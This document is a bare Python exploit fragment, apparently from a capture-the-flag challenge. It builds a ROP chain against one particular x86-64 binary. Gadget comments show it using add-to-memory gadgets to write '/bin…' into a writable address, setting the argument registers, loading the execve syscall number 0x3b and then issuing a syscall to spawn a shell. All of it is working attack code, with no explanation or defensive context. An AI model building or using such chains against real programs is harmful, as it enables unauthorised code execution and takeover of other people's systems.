payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x40a0ad)+p64(0x403544)
# 0x0000000000403544: pop rbx; ret; 
payload += p64(0x6e69622f)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x40a0b1)+p64(0x403544)
# 0x0000000000403544: pop rbx; ret; 
payload += p64(0x68662f)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x40a070)+p64(0x403eec)
# 0x0000000000403eec: pop rsi; ret; 
payload += p64(0x0)+p64(0x407005)
# 0x407005: pop rdx ; ret
payload += p64(0x0)+p64(0x403403)
# 0x0000000000403403: mov eax, dword ptr [rsp + 8]; add rsp, 0x18; pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x3b)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x4035f3)
# 0x00000000004035f3: syscall; 
payload += b''
